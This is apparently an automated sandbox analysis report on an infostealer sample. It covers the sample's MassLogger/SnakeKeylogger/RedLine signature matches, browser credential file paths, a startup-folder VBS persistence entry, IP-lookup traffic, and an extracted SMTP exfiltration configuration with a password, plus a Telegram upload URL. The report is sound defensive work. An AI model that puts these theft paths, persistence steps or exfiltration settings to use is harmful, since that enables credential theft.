11.2.RegSvcs.exe.2590cb6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d844:$a1: get_encryptedPassword 0x1d818:$a2: get_encryptedUsername 0x1d8dc:$a3: get_timePasswordChanged 0x1d7f4:$a4: get_passwordField 0x1d85a:$a5: set_encryptedPassword 0x1d627:$a7: get_logins 0x1cb95:$a8: GetOutlookPasswords 0x1c0a9:$a9: StartKeylogger 0x1ab03:$a10: KeyLoggerEventArgs 0x1aad2:$a11: KeyLoggerEventArgsEventHandler 0x1d6fb:$a13: _encryptedPassword
11.2.RegSvcs.exe.2590cb6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21f33:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21431:$a3: \Google\Chrome\User Data\Default\Login Data 0x2173f:$a4: \Orbitum\User Data\Default\Login Data 0x22537:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.2590cb6.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.2590cb6.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.2590cb6.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.2590cb6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.2590cb6.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ba44:$a1: get_encryptedPassword 0x1ba18:$a2: get_encryptedUsername 0x1badc:$a3: get_timePasswordChanged 0x1b9f4:$a4: get_passwordField 0x1ba5a:$a5: set_encryptedPassword 0x1b827:$a7: get_logins 0x1ad95:$a8: GetOutlookPasswords 0x1a2a9:$a9: StartKeylogger 0x18d03:$a10: KeyLoggerEventArgs 0x18cd2:$a11: KeyLoggerEventArgsEventHandler 0x1b8fb:$a13: _encryptedPassword
11.2.RegSvcs.exe.2590cb6.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20133:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f631:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f93f:$a4: \Orbitum\User Data\Default\Login Data 0x20737:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.38f6458.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.38f6458.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.38f6458.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.38f6458.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.38f6458.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c95c:$a1: get_encryptedPassword 0x44c94:$a1: get_encryptedPassword 0x1c930:$a2: get_encryptedUsername 0x44c68:$a2: get_encryptedUsername 0x1c9f4:$a3: get_timePasswordChanged 0x44d2c:$a3: get_timePasswordChanged 0x1c90c:$a4: get_passwordField 0x44c44:$a4: get_passwordField 0x1c972:$a5: set_encryptedPassword 0x44caa:$a5: set_encryptedPassword 0x1c73f:$a7: get_logins 0x44a77:$a7: get_logins 0x1bcad:$a8: GetOutlookPasswords 0x43fe5:$a8: GetOutlookPasswords 0x1b1c1:$a9: StartKeylogger 0x434f9:$a9: StartKeylogger 0x19c1b:$a10: KeyLoggerEventArgs 0x41f53:$a10: KeyLoggerEventArgs 0x19bea:$a11: KeyLoggerEventArgsEventHandler 0x41f22:$a11: KeyLoggerEventArgsEventHandler 0x1c813:$a13: _encryptedPassword
11.2.RegSvcs.exe.38f6458.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2104b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49383:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20549:$a3: \Google\Chrome\User Data\Default\Login Data 0x48881:$a3: \Google\Chrome\User Data\Default\Login Data 0x20857:$a4: \Orbitum\User Data\Default\Login Data 0x48b8f:$a4: \Orbitum\User Data\Default\Login Data 0x2164f:$a5: \Kometa\User Data\Default\Login Data 0x49987:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.5710000.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5710000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5710000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5710000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5710000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c95c:$a1: get_encryptedPassword 0x1c930:$a2: get_encryptedUsername 0x1c9f4:$a3: get_timePasswordChanged 0x1c90c:$a4: get_passwordField 0x1c972:$a5: set_encryptedPassword 0x1c73f:$a7: get_logins 0x1bcad:$a8: GetOutlookPasswords 0x1b1c1:$a9: StartKeylogger 0x19c1b:$a10: KeyLoggerEventArgs 0x19bea:$a11: KeyLoggerEventArgsEventHandler 0x1c813:$a13: _encryptedPassword
7.2.RegSvcs.exe.5710000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2104b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20549:$a3: \Google\Chrome\User Data\Default\Login Data 0x20857:$a4: \Orbitum\User Data\Default\Login Data 0x2164f:$a5: \Kometa\User Data\Default\Login Data
6.2.neophobia.exe.2320000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.RegSvcs.exe.5710000.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5710000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5710000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5710000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.5710000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab5c:$a1: get_encryptedPassword 0x1ab30:$a2: get_encryptedUsername 0x1abf4:$a3: get_timePasswordChanged 0x1ab0c:$a4: get_passwordField 0x1ab72:$a5: set_encryptedPassword 0x1a93f:$a7: get_logins 0x19ead:$a8: GetOutlookPasswords 0x193c1:$a9: StartKeylogger 0x17e1b:$a10: KeyLoggerEventArgs 0x17dea:$a11: KeyLoggerEventArgsEventHandler 0x1aa13:$a13: _encryptedPassword
7.2.RegSvcs.exe.5710000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f24b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e749:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ea57:$a4: \Orbitum\User Data\Default\Login Data 0x1f84f:$a5: \Kometa\User Data\Default\Login Data
11.2.RegSvcs.exe.38f5570.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.RegSvcs.exe.38f5570.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.38f5570.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.38f5570.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.38f5570.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ba44:$a1: get_encryptedPassword 0x1ba18:$a2: get_encryptedUsername 0x1badc:$a3: get_timePasswordChanged 0x1b9f4:$a4: get_passwordField 0x1ba5a:$a5: set_encryptedPassword 0x1b827:$a7: get_logins 0x1ad95:$a8: GetOutlookPasswords 0x1a2a9:$a9: StartKeylogger 0x18d03:$a10: KeyLoggerEventArgs 0x18cd2:$a11: KeyLoggerEventArgsEventHandler 0x1b8fb:$a13: _encryptedPassword
11.2.RegSvcs.exe.38f5570.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20133:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f631:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f93f:$a4: \Orbitum\User Data\Default\Login Data 0x20737:$a5: \Kometa\User Data\Default\Login Data
10.2.neophobia.exe.ba0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C1 88 44 24 2B 88 44 24 2F B0 7B 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
Click to see the 71 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , ProcessId: 3684, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs" , ProcessId: 3684, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\scrolar\neophobia.exe, ProcessId: 1796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:16:02.394160+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49705	132.226.8.169	80	TCP
2025-01-10T23:16:10.200043+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 11.2.RegSvcs.exe.391e790.5.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for submitted file

Source: 7b4Iaf58Rp.exe	Virustotal: Detection: 68%			Perma Link
Source: 7b4Iaf58Rp.exe	ReversingLabs: Detection: 91%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 7b4Iaf58Rp.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 7b4Iaf58Rp.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49710 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49712 version: TLS 1.0

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.2664241495.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002763000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: neophobia.exe, 00000002.00000003.1494562152.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000002.00000003.1494436080.0000000003990000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525158722.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525781731.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1567516685.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1569671446.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1647543407.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1644978259.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: neophobia.exe, 00000002.00000003.1494562152.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000002.00000003.1494436080.0000000003990000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525158722.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525781731.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1567516685.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1569671446.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1647543407.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1644978259.0000000003600000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FF445A
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFC6D1 FindFirstFileW,FindClose,	0_2_00FFC6D1
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00FFC75C
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFEF95
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FFF0F2
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFF3F3
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF37EF
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FF3B12
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00FFBCBC
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00DA445A
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAC6D1 FindFirstFileW,FindClose,	2_2_00DAC6D1
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00DAC75C
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DAEF95
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DAF0F2
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DAF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DAF3F3
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00DA37EF
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00DA3B12
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DABCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_02DDE108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05759021h	7_2_05758D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05759775h	7_2_05759358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05759775h	7_2_057596A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 05759775h	7_2_05759348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	11_2_0270E108

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49710 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49712 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_010022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_010022EE

Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/ HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2664984338.0000000003210000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.2664984338.0000000003199000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.2664984338.000000000323C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000007.00000002.2664984338.00000000031D8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.0000000002959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000007.00000002.2664984338.000000000321C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664477879.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

